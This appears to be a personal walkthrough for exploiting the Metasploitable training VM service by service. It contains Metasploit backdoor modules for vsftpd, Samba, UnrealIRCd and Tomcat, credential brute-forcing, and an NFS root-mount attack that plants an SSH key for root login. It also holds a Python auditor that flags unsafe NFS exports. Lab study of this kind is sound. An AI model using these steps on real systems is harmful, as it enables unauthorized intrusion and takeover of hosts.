Metasploitable OS Complete Solved

## Port 21 & 2121
# Searching for the FTP version
auxiliary/scanner/ftp/ftp_version
# Exploiting the vsftpd 2.3.4 backdoor
exploit/unix/ftp/vsftpd_234_backdoor
### Port 2121
# Start PostgreSQL (Metasploit's database backend) before running the scanner
systemctl start postgresql
auxiliary/scanner/ftp/ftp_login
> ftp <ip> 2121
## Port 22
auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/ssh/ssh_login
## Port 23 & 1524
auxiliary/scanner/telnet/telnet_login
### Telnet sends credentials in cleartext, so Wireshark can be used to inspect the login
ncat <ip> 1524
## Port 25
# SMTP
auxiliary/scanner/smtp/smtp_enum
### Verifying which of the enumerated users exist on the server
nc <machineIP> 25  # port 25 is SMTP
VRFY <username_Enumerated>
## Port 53 ISC BIND (DNS)
Port 53 is used by DNS (Domain Name System). BIND (Berkeley Internet Name Domain) is a widely used DNS server; DNS takes care of resolving human-readable host names into numeric IP addresses. BIND has had a long history of security problems, so BIND and port 53 are frequent targets, and a couple of worms have used BIND exploits to propagate.
https://www.exploit-db.com/exploits/6122/
auxiliary/spoof/dns/bailiwicked_domain
## Apache HTTPd 80
It hosts DVWA on the Metasploitable OS, but the web server itself can also be exploited.
nbtscan -r <ip_range>/24
dirb http://<ip>/
http://<ip>/phpinfo.php
msf6 > use auxiliary/scanner/http/http_version
cadaver http://<website>/dav/
# An interactive cadaver shell (dav:/dav/> prompt) should appear
## Port 111 / 2049 RPCbind and NFS
RPC: Remote Procedure Call; NFS: Network File System
rpcinfo -p <ip>
sudo mkdir -p /root/.ssh
cd /root/.ssh
### Generating SSH keys
ssh-keygen -t rsa -b 4096
### Mounting the filesystem
mount -o nolock -t nfs <ip>:/ /mnt
### Listing the mounted filesystems
df -k
cd /mnt/root/.ssh
cp /root/.ssh/<filename>.pub /mnt/root/.ssh/
### To make an SSH connection, append the generated public key to the
target's authorized_keys file
cat <publickey> >> authorized_keys
ssh -i /root/.ssh/<file> root@<ip>
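A defensive check for the misconfiguration this NFS section relies on (the whole filesystem exported to any client without root squashing), added here as an example that is not part of the original notes: it parses exports(5) syntax and flags the risky entries. The sample /etc/exports content is constructed.

```python
"""Audit /etc/exports for the weakness the NFS section above abuses:
the root filesystem exported to every client with no_root_squash.
Added example, not part of the original notes; the sample file is constructed."""
import re

# Constructed sample resembling a Metasploitable-style export of "/".
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/ *(rw,sync,no_root_squash,no_subtree_check)
/srv/share 10.0.0.0/24(ro,sync,root_squash)
/home/proj  192.168.56.10(rw,sync)
"""

def parse_exports(text):
    """Parse exports(5) lines into (path, client, [options]) tuples."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]  # bare path = everyone
        for spec in clients:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"                 # "(rw)" alone = everyone
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append((path, client, opts))
    return entries

def findings(path, client, opts):
    """List the weaknesses of one export entry (empty list = nothing flagged)."""
    issues = []
    if path == "/":
        issues.append("exports the entire root filesystem")
    if client == "*":
        issues.append("exported to any client (wildcard)")
    if "no_root_squash" in opts:
        issues.append("no_root_squash: remote root writes as local root")
    if "rw" in opts:
        issues.append("writable")
    return issues

def audit(text):
    """Map 'path -> client' to its findings, omitting clean entries."""
    report = {f"{p} -> {c}": findings(p, c, o) for p, c, o in parse_exports(text)}
    return {key: issues for key, issues in report.items() if issues}
```

Running `audit(open("/etc/exports").read())` on a host reports every entry that shares the root tree, allows any client, disables root squashing or is writable.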
## Port 5900 VNC
auxiliary/scanner/vnc/vnc_login
vncviewer <ip>
## Port 139 & 445 NetBIOS-SSN / SMB
auxiliary/scanner/smb/smb_version
exploit/multi/samba/usermap_script
## Port 512, 513, 514
These ports belong to the remote-login "r" services (rexec on 512, rlogin on 513, rsh on 514), which allow logging in to the system; access to them is controlled by TCP Wrappers.
sudo apt install rsh-client
rlogin -l root <ip>
## Port 1099 Java RMI server
auxiliary/scanner/misc/java_rmi_server
exploit/multi/misc/java_rmi_server
## Port 3306 MySQL
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login
# Brute-forcing with mysql_login yields the password
mysql -u <user> -p -h <ip>
### Some MySQL commands
show databases;
use <database_name>;
show tables;
describe <table_name>;  -- then query the table with a SELECT statement
## Port 5432 PostgreSQL
auxiliary/scanner/postgres/postgres_login
<default postgres password>
psql -h <ip> -U <username>
## Port 6667 Internet Relay Chat (IRC)
service postgresql start  # Metasploit's database backend (IRC requires a server to communicate with)
exploit/unix/irc/unreal_ircd_3281_backdoor
### IRC was built with flood prevention
show payloads
set payload <ruby_payload_from_the_list>
## Port 8180 Apache Tomcat
Port 8180 is used by the Apache Tomcat service, which runs Java web applications.
Try a default-credential list (available on GitHub) for Apache Tomcat manager logins
exploit/multi/http/tomcat_mgr_upload
~ Ghoul